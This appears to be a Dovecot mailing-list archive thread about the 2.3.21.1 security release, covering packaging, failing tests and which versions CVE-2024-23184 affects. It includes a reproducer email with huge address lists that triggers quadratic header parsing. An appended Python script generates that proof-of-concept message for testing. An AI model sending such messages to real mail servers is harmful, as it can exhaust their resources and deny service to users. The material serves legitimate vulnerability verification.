Re: Dovecot v2.3.21.1 released

2024-09-06 Thread Peter via dovecot

On 15/08/24 00:07, Marc via dovecot wrote:


we are releasing a CVE patch release 2.3.21.1.

https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz
https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig
Binary packages in https://repo.dovecot.org/
Docker images in https://hub.docker.com/r/dovecot/dovecot


I know about these issues with openssl 3 and if I remember correctly this is 
solved in 2.4. But when do you expect packages for el9 to be available?


El9 packages are in GhettoForge:
http://ghettoforge.org/

2.3.21.1 is being built now and will hopefully be released in a couple 
of hours.



Peter
___
dovecot mailing list -- dovecot@dovecot.org
To unsubscribe send an email to dovecot-le...@dovecot.org


Re: Dovecot v2.3.21.1 released

2024-09-06 Thread Peter via dovecot

On 14/08/24 23:25, Aki Tuomi via dovecot wrote:

Hi all,

we are releasing a CVE patch release 2.3.21.1.

https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz
https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig
Binary packages in https://repo.dovecot.org/
Docker images in https://hub.docker.com/r/dovecot/dovecot


Tests failing when attempting to build for both EL8 and 9:

test-failures.c:152: Assert failed: internal_line_match(line, 
long_log_prefix, TEXT128)
test-failures.c:152: Assert failed: internal_line_match(line, 
long_log_prefix, TEXT128)
test-failures.c:152: Assert failed: internal_line_match(line, 
long_log_prefix, TEXT128)


...this test did not fail in 2.3.21


Peter


RE: Dovecot v2.3.21.1 released

2024-09-06 Thread Marc via dovecot
> On 14/08/24 23:25, Aki Tuomi via dovecot wrote:
> > Hi all,
> >
> > we are releasing a CVE patch release 2.3.21.1.
> >
> > https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz
> > https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig
> > Binary packages in https://repo.dovecot.org/
> > Docker images in https://hub.docker.com/r/dovecot/dovecot
> 
> Tests failing when attempting to build for both EL8 and 9:
> 

When is 2.4 for el9 expected?


Re: Dovecot v2.3.21.1 released

2024-09-06 Thread Peter via dovecot

On 7/09/24 00:55, Marc via dovecot wrote:

On 14/08/24 23:25, Aki Tuomi via dovecot wrote:

Hi all,

we are releasing a CVE patch release 2.3.21.1.

https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz
https://dovecot.org/releases/2.3/dovecot-2.3.21.1.tar.gz.sig
Binary packages in https://repo.dovecot.org/
Docker images in https://hub.docker.com/r/dovecot/dovecot


Tests failing when attempting to build for both EL8 and 9:


When is 2.4 for el9 expected?


GhettoForge will release it after the general availability of 2.4. 
Others from Dovecot have stated that it will be available directly from 
the dovecot ce repos once 2.4 is released.



Peter


Re: Dovecot v2.3.21.1 released

2024-09-06 Thread Timo Sirainen via dovecot
On 2. Sep 2024, at 15.44, Guilhem Moulin via dovecot wrote:
> 
> Hi Aki,
> 
>> we are releasing a CVE patch release 2.3.21.1.
> 
> Your message to the oss-security list [0] says both 2.2 and 2.3 versions
> are vulnerable to CVE-2024-23184.  Using the following test message as
> reproducer
> 
>   From: f...@example.net
>   To: b...@example.net
>     , b...@example.net
>     […]
>     , bar$n...@example.net
>   Bcc: b...@example.net
>   […]
>   Bcc: baz$n...@example.net
>   Date: $(LC_TIME=C.UTF-8 date -R)
>   Subject: boom
>   Message-Id: $(cat /proc/sys/kernel/random/uuid)@example.net
> 
>   boom
> 
> I could reproduce the issue back to 2.3.10 but not with earlier
> versions.  I used `doveadm fetch imap.envelope all` to measure the
> (non-cached) IMAP ENVELOPE command.
> 
> For n=100k, it takes ~20s with 2.3.19 vs. ~0.5s with early 2.3.x and
> 2.2.x.  For n=500k, I measured ~2s with early 2.3.x and 2.2.x, so for
> these versions it doesn't look like parsing is O(n²) in the number of
> addresses.
> 
> I didn't try to bisect to pinpoint the exact commit, but AFAICT the main
> problem you described
> 
> | each header line's address is added to the end of a linked list. This
> | is done by walking the whole linked list, which becomes more inefficient
> | the more addresses there are.
> 
> was introduced in 2.3.10 by
> https://github.com/dovecot/core/commit/469fcd3bdd7df40bb8f4d131121f3bfbceade02a .
> 
> Is my reproducer/analysis incorrect, or are versions before 2.3.10
> immune to CVE-2024-23184?  (AFAICT they are affected by CVE-2024-23185;
> only talking about -23184 here.)

Yes, looks like this is all correct. I guess we didn't really verify the oldest 
version this affects.

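Added example (editor's note, not code from Dovecot or from anyone in this thread): the script below builds a message in the shape of the reproducer Guilhem quotes, with an n-address folded To: header and n separate Bcc: lines, and models the append pattern Timo's oss-security text describes, where each parsed address is put at the end of a singly linked list by walking from the head. Counting the nodes visited per append gives the N(N-1)/2 growth behind CVE-2024-23184, next to a tail-pointer append that walks nothing. The addresses (foo/bar/baz at example.net) are constructed placeholders, since the archive redacted the originals, and the linked-list walk is a model of the described behaviour, not Dovecot's parser; measuring the real thing still means writing the output into a test Maildir and timing `doveadm fetch imap.envelope all` as Guilhem did.

```python
"""Added example: reproducer builder plus a model of the quadratic
linked-list append described for CVE-2024-23184. Not Dovecot code."""
import re
import sys
import uuid
from dataclasses import dataclass
from email.utils import formatdate
from typing import Iterator, Optional

# Constructed addresses; the thread's real ones are redacted by the archive.
ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+")
ENVELOPE_HEADERS = ("from", "sender", "reply-to", "to", "cc", "bcc")


def build_reproducer(n: int) -> str:
    """Return an RFC 5322 message with n+1 addresses folded into one To:
    header and n separate Bcc: headers, following the quoted reproducer."""
    to_lines = ["To: bar0@example.net"] + [
        f"  , bar{i}@example.net" for i in range(1, n + 1)
    ]
    bcc_lines = [f"Bcc: baz{i}@example.net" for i in range(1, n + 1)]
    headers = [
        "From: foo@example.net",
        *to_lines,
        *bcc_lines,
        f"Date: {formatdate()}",
        "Subject: boom",
        f"Message-Id: <{uuid.uuid4()}@example.net>",
    ]
    return "\n".join(headers) + "\n\nboom\n"


def unfold_headers(raw: str) -> Iterator[tuple[str, str]]:
    """Yield (name, value) pairs, joining folded continuation lines
    (leading SP/HTAB) onto the header they belong to."""
    merged: list[str] = []
    for line in raw.split("\n\n", 1)[0].split("\n"):
        if line[:1] in (" ", "\t") and merged:
            merged[-1] += " " + line.strip()
        else:
            merged.append(line)
    for header in merged:
        name, _, value = header.partition(":")
        yield name.strip().lower(), value.strip()


@dataclass
class Node:
    addr: str
    next: Optional["Node"] = None


def collect_addresses(raw: str, tail_pointer: bool) -> tuple[list[str], int]:
    """Append every envelope-header address to a linked list.

    tail_pointer=False walks from the head on every append (the pattern
    described in the thread); tail_pointer=True keeps a pointer to the last
    node. Returns (addresses in order, nodes visited while walking)."""
    head = tail = None
    visited = 0
    for name, value in unfold_headers(raw):
        if name not in ENVELOPE_HEADERS:
            continue
        for addr in ADDR_RE.findall(value):
            node = Node(addr)
            if head is None:
                head = tail = node
            elif tail_pointer:
                tail.next = node
                tail = node
            else:
                cur = head
                visited += 1
                while cur.next is not None:  # O(length) walk per append
                    cur = cur.next
                    visited += 1
                cur.next = node
    out, cur = [], head
    while cur is not None:
        out.append(cur.addr)
        cur = cur.next
    return out, visited


if __name__ == "__main__":
    # Emit a reproducer, e.g. `python3 repro.py 100000 > Maildir/cur/1.`
    # in a throwaway account, then time `doveadm fetch imap.envelope all`
    # on an affected build against a fixed one.
    count = int(sys.argv[1]) if len(sys.argv) > 1 else 1000
    sys.stdout.write(build_reproducer(count))
```

With N addresses in total, the head-walking append visits 1 + 2 + ... + (N-1) = N(N-1)/2 nodes, which is the O(n²) behaviour the thread measures at n=100k; the tail-pointer variant visits none, matching the ~linear timings Guilhem reports for 2.2.x and early 2.3.x.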